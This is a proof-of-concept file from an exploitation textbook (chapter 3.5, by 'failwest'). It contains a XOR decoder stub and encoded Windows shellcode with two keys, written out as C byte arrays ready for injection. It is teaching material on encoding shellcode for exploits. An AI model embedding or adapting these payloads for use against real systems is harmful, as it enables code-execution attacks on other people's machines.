/*****************************************************************************
      To be the apostrophe which changed "Impossible" into "I'm possible"!
		
POC code of chapter 3.5 in book "Vulnerability Exploit and Analysis Technique"
 
file name	: machine_code.txt
author		: failwest  
date		: 2006.11.11
description	: binary code which extracted from PE file
		  include decoder and encoded shellcode    
Noticed		: 
version		: 1.0
E-mail		: failwest@gmail.com
		
	Only for educational purposes    enjoy the fun from exploiting :)
******************************************************************************/


decoder which dumped from OllyDbg directly:

0040102F   83C0 14          ADD EAX,14
00401032   33C9             XOR ECX,ECX
00401034   8A1C08           MOV BL,BYTE PTR DS:[EAX+ECX]
00401037   80F3 44          XOR BL,44
0040103A   881C08           MOV BYTE PTR DS:[EAX+ECX],BL
0040103D   41               INC ECX
0040103E   80FB 90          CMP BL,90
00401041  ^75 F1            JNZ SHORT decoder.00401034




machine code of decoder ( key=0x44 )

"\x83\xC0\x14"          //ADD EAX,14
"\x33\xC9"             //XOR ECX,ECX
"\x8A\x1C\x08"           //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44"          //XOR BL,44   //notice 0x04 is taken as temp key to decode !
"\x88\x1C\x08"           //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41"               //INC ECX
"\x80\xFB\x90"          //CMP BL,90
"\x75\xF1"            //JNZ SHORT decoder.00401034






encoded shellcode (key=0x44):

"\xb8\x2c\x2e\x4e\x7c\x5a\x2c\x27\xcd\x95\x0b\x2c\x76\x30\xd5\x48"
"\xcf\xb0\xc9\x3a\xb0\x77\x9f\xf3\x40\x6f\xa7\x22\xff\x77\x76\x17"
"\x2c\x31\x37\x21\x36\x10\x77\x96\x20\xcf\x1e\x74\xcf\x0f\x48\xcf"
"\x0d\x58\xcf\x4d\xcf\x2d\x4c\xe9\x79\x2e\x4e\x7c\x5a\x31\x41\xd1"
"\xbb\x13\xbc\xd1\x24\xcf\x01\x78\xcf\x08\x41\x3c\x47\x89\xcf\x1d"
"\x64\x47\x99\x77\xbb\x03\xcf\x70\xff\x47\xb1\xdd\x4b\xfa\x42\x7e"
"\x80\x30\x4c\x85\x8e\x43\x47\x94\x02\xaf\xb5\x7f\x10\x60\x58\x31"
"\xa0\xcf\x1d\x60\x47\x99\x22\xcf\x78\x3f\xcf\x1d\x58\x47\x99\x47"
"\x68\xff\xd1\x1b\xef\x13\x25\x79\x2e\x4e\x7c\x5a\x31\xed\x77\x9f"
"\x17\x2c\x33\x21\x37\x30\x2c\x22\x25\x2d\x28\xcf\x80\x17\x14\x14"
"\x17\xbb\x13\xb8\x17\xbb\x13\xbc\xd4";






//key=0x44
char final_sc_44[]=
"\x83\xC0\x14"          //ADD EAX,14
"\x33\xC9"             //XOR ECX,ECX
"\x8A\x1C\x08"           //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44"          //XOR BL,44   //notice 0x44 is taken as temp key to decode !
"\x88\x1C\x08"           //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41"               //INC ECX
"\x80\xFB\x90"          //CMP BL,90
"\x75\xF1"            //JNZ SHORT decoder.00401034
"\xb8\x2c\x2e\x4e\x7c\x5a\x2c\x27\xcd\x95\x0b\x2c\x76\x30\xd5\x48"
"\xcf\xb0\xc9\x3a\xb0\x77\x9f\xf3\x40\x6f\xa7\x22\xff\x77\x76\x17"
"\x2c\x31\x37\x21\x36\x10\x77\x96\x20\xcf\x1e\x74\xcf\x0f\x48\xcf"
"\x0d\x58\xcf\x4d\xcf\x2d\x4c\xe9\x79\x2e\x4e\x7c\x5a\x31\x41\xd1"
"\xbb\x13\xbc\xd1\x24\xcf\x01\x78\xcf\x08\x41\x3c\x47\x89\xcf\x1d"
"\x64\x47\x99\x77\xbb\x03\xcf\x70\xff\x47\xb1\xdd\x4b\xfa\x42\x7e"
"\x80\x30\x4c\x85\x8e\x43\x47\x94\x02\xaf\xb5\x7f\x10\x60\x58\x31"
"\xa0\xcf\x1d\x60\x47\x99\x22\xcf\x78\x3f\xcf\x1d\x58\x47\x99\x47"
"\x68\xff\xd1\x1b\xef\x13\x25\x79\x2e\x4e\x7c\x5a\x31\xed\x77\x9f"
"\x17\x2c\x33\x21\x37\x30\x2c\x22\x25\x2d\x28\xcf\x80\x17\x14\x14"
"\x17\xbb\x13\xb8\x17\xbb\x13\xbc\xd4";









//key = 0x04
char final_sc_04[]=
"\x83\xC0\x15"          //ADD EAX,15
"\x33\xC9"             //XOR ECX,ECX
"\x8A\x1C\x08"           //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x04"          //XOR BL,4   //notice 0x04 is taken as temp key to decode !
"\x88\x1C\x08"           //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41"               //INC ECX
"\x80\xFB\x90"          //CMP BL,90
"\x75\xF1"            //JNZ SHORT decoder.00401034
"\xf8\x6c\x6e\x0e\x3c\x1a\x6c\x67\x8d\xd5\x4b\x6c\x36\x70\x95\x08"
"\x8f\xf0\x89\x7a\xf0\x37\xdf\xb3\x00\x2f\xe7\x62\xbf\x37\x36\x57"
"\x6c\x71\x77\x61\x76\x50\x37\xd6\x60\x8f\x5e\x34\x8f\x4f\x08\x8f"
"\x4d\x18\x8f\x0d\x8f\x6d\x0c\xa9\x39\x6e\x0e\x3c\x1a\x71\x01\x91"
"\xfb\x53\xfc\x91\x64\x8f\x41\x38\x8f\x48\x01\x7c\x07\xc9\x8f\x5d"
"\x24\x07\xd9\x37\xfb\x43\x8f\x30\xbf\x07\xf1\x9d\x0b\xba\x02\x3e"
"\xc0\x70\x0c\xc5\xce\x03\x07\xd4\x42\xef\xf5\x3f\x50\x20\x18\x71"
"\xe0\x8f\x5d\x20\x07\xd9\x62\x8f\x38\x7f\x8f\x5d\x18\x07\xd9\x07"
"\x28\xbf\x91\x5b\xaf\x53\x65\x39\x6e\x0e\x3c\x1a\x71\xad\x37\xdf"
"\x57\x6c\x73\x61\x77\x70\x6c\x62\x65\x6d\x68\x8f\xc0\x57\x54\x54"
"\x57\xfb\x53\xf8\x57\xfb\x53\xfc\x94";